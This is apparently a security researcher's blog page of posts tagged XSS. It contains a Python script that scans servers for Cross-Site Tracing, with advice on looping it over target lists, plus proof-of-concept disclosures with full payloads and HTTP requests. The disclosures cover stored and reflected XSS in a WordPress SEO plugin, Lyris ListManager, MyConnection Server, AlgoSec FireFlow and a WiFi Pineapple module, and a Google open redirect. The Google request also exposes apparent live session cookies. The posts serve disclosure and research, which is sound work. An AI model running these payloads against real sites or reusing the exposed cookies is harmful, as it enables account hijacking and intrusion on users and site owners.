Treadstone Security: xss

Showing posts with label xss. Show all posts

Saturday, February 28, 2015

Cross-Site Tracer Exploit

#!/usr/bin/python
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, you can create a list of domains or IP addresses to iterate through by doing 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#

import socket
import time
import sys, getopt

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def main(argv):
    argc = len(argv)

    if argc <= 2:
        print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC
        print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC
            print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC
            sys.exit(0)

    target = argv[1] # SET TARGET
    port = argv[2] # SET PORT

    buffer1 = "TRACE / HTTP/1.1"
    buffer2 = "Test: <script>alert(1);</script>"
    buffer3 = "Host: " + target

    print ""
    print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 "
    print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com"
    print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port

    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    result=s.connect_ex((target,int(port)))

    if result == 0:
        s.send(buffer1 + "\n")
        s.send(buffer2 + "\n")
        s.send(buffer3 + "\n\n")
        data = s.recv(1024)
        script = "alert"
        if script.lower() in data.lower():
            print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC
            print ""
            print bcolors.WARNING + data + bcolors.ENDC
        else:
            print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!"
            print ""
            print ""

    else:
        print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC

    s.close()

main(sys.argv)

Tuesday, December 30, 2014

WiFi Pineapple MK5 / SSLSplit v1.1 Cross-Site Scripting (Stored)

Vendor: Hak5
Website: http://www.hak5.com
Hardware: Wifi Pineapple MK5
Software: SSLSplit
Version: 1.1
Author: 1N3

I'm releasing this info purely for educational purposes. There appears to be a stored Cross-Site Scripting vulnerability in the SSLSplit v.1.1 infusion for the Pineapple MK5. This could be used by a rogue wifi user to invoke a Cross-Site Scripting vulnerability on the owner of the Pineapple wifi device when viewing the SSLSplit logs.

Reproduction Steps:
1. Attacker sets up a RogueAP using PineappleV with SSLSplit running
2. A Wifi user connects to the PinappleV RogueAP setup
3. Wifi user then creates an image on his webserver with meta tags embedded with the following string: "></script>">'><img src=x onerror=confirm(4)>
4. Wifi user opens a web browser and navigates to the affected image they just created
5. Attacker then tries to download his logs via the SSLSplit web UI (SSLSplit > History > Click "Download" for the affected log file)

Result:
Alert window message is displayed to attacker

Friday, November 28, 2014

Google Captcha Open Redirect

Google's captcha page suffers from an open redirect vulnerability because it fails to verify that the "continue" parameter in the URI is actually a Google domain or even the referring domain. After checking Google's bug bounty however, they state:

"URL redirection. We recognize that the address bar is the only reliable security indicator in modern browsers; consequently, we hold that the usability and security benefits of a small number of well-designed and closely monitored redirectors outweigh their true risks".

So, I'm publicly disclosing this as a POC for research/educational purposes...

Affected URL:
https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search

GET /sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com%2Fsearch&id=14323360019737732799&captcha=phaures&submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search
Cookie: NID=67=IJICmq9eG5l0yY71_TfQozLw8DqSRnymUmwzff1ftXnOJUKR1DmQ6oNiVUHutjOq8gSK-U5pHi96fgeEcjj7PX_tzBD5A_mOXE5wgZFddOC1p7gpn6gh7OfKbY8yASBSdChbMBpd2599HQqixF_yQZJJ3YGLPE0ojZGWkkX-ArdVUC_-pN9koTIoKx9eE0YY8SXE6GjnCnhvQYfEQuDW-Uxe; SID=DQAAAOkAAABhw0WvrjkT8xQH6c2XgaLv0p-tL5jZLgztm7PS4qjUKRW5A82hfRjqWIfUtygXtsOMVn79HsfuJlvygQihmq_jLIiKcVBSD6sP_j1zjQ70SJXlu_CwJS8BbCB6qte5owth0Woh9QYpQwlb3oGiIO14jzMO3J2bB3igtHuM9zw_FeeuV-45KLypZVSQ3vRgi1ql3CwCaGwdDOWsKX6sXYupSTWuwJGXlDoUbRelbGbNbj5lFk8zjH7i_OpSHtoObNSxcez8XKDdGGCXBunuxjmR5AJFPfOZAtuxUyNvepJNdtl85w9dp2rBmNK0vdy36Bg; HSID=An9s7nZT7S1d_V9NH; SSID=A5E1or_MNlR1bvfU0; APISID=NYY4lJPJNBtsj_OP/A93qTAJ9-5f1twNHn; SAPISID=yMRvPFxee5Yw48l7/A7k5Ks0Cjoi06jpEW; PREF=ID=062dffbad71fd850:U=741c8f032b07f996:FF=0:LD=en:TM=1415471152:LM=1415472410:GM=1:S=SJROGFDVcQgxz3Bj; GOOGLE_ABUSE_EXEMPTION=ID=b1036b53551499da:TM=1417137339:C=c:IP=37.221.161.234-:S=APGng0sgdi6BVBm7QOwlNSTnlE3Uvcupow
Connection: keep-alive
Host: ipv4.google.com

GET /search?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db1036b53551499da:TM%3D1417137339:C%3Dc:IP%3D37.221.161.234-:S%3DAPGng0v_nA-tCWgqXfxnch6lFhMcnFuAeg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DFri,+28-Nov-2014+04:15:39+GMT HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __unam=7639673-1499c44efc6-201377d0-26; _ga=GA1.2.1993885406.1416758620; PHPSESSID=kph66vkf5on6879ivj7paml4o4
Connection: keep-alive
Host: www.xerosecurity.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 28 Nov 2014 01:08:32 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 28 Nov 2014 00:39:03 GMT
ETag: "e40dbf-47-508e07cd2d95b"
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<html>
<head></head>
<body>
<script>alert(1);</script>
</body>
</html>

Wednesday, August 13, 2014

All In One SEO Pack v.2.2.2 Stored XSS

Author: 1N3
Website: http://xerosecurity.com
Vender Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2

ABOUT:

All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. A malicious author or admin of a site could use this flaw to secretly redirect users of a site to a malicious site or steal session cookies of other users.

NOTE: User must have the ability to publish pages in the affected Wordpress site (usually Author or Admin roles required).

POC:
http://localhost/wordpress/wp-admin/post.php?post_type=page

Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1
Content-Type=application/x-www-form-urlencoded
Content-Length=1856

POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E

Thursday, July 31, 2014

Lyris ListManagerWeb 8.95a Reflective XSS

Author: 1N3
Website: http://xerosecurity.com
Vender Website: http://lyris.com/us-en/products/listmanager
Affected Product: Lyris ListManagerWeb
Affected Version: 8.95a

ABOUT:
Lyris ListManager (Lyris LM) is an on-premises email marketing software for companies that require the ability to deploy high-volume email programs behind a firewall. Version 8.95a suffers from a cross site scripting (XSS) vulnerability in the “doemailpassword.tml” page because it fails to properly sanitize the “EmailAddr” POST variable.

POC:
POST http://host.com/doemailpassword.tml HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://host.com/emailpassword.tml
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Proxy-Connection: Keep-Alive
Host: host.com

EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E

Monday, July 21, 2014

MyConnection Server (MCS) Reflective XSS

Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vender Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to inject client side javascript to run in the context of the user browsing the website. Several parameters including testtype, ver, cm, map, lines, duration and others appear to be vulnerable.

POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script>

VULNERABLE CODE:

* Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to reflective XSS.

<td valign="top" width="30%"><b>Current
    Settings</b>
          <br>
          <br>
          <b>VoIP Lines Simulated</b>:
          <script type="text/javascript"> document.write(voiplines); </script><br>
          <b>Test Length</b>:
          <script type="text/javascript"> document.write(testlength); </script><br>
          <b>Codec</b>:
          <script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
    else { document.write(nameg729); }
          </script><br>
          </td>
          <td align="left" width="70%">
          <p align="center">
<script>

Monday, June 9, 2014

AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws

x---==== Exploit Title: AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws
x---==== Date: Mon Jun 9 2014
x---==== Author: 1N3
x---==== Homepage: http://treadstonesecurity.blogspot.ca
x---==== Software Link: http://www.algosec.com/en/products_solutions/products/fireflow
x---==== Version: 6.3 (Other versions may also be susceptible)

x---==== Vulnerability
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflective XSS and HTML injection attacks. This may allow attackers to automatically execute arbitrary javascript on behalf of other logged in users on the system by substituting XSS code in their signature.

x---==== Vulnerable URL:
https://fireflowhostname.com/FireFlow/SelfService/Prefs.html

x---==== XSS Code:
<script>alert(document.cookie)</script>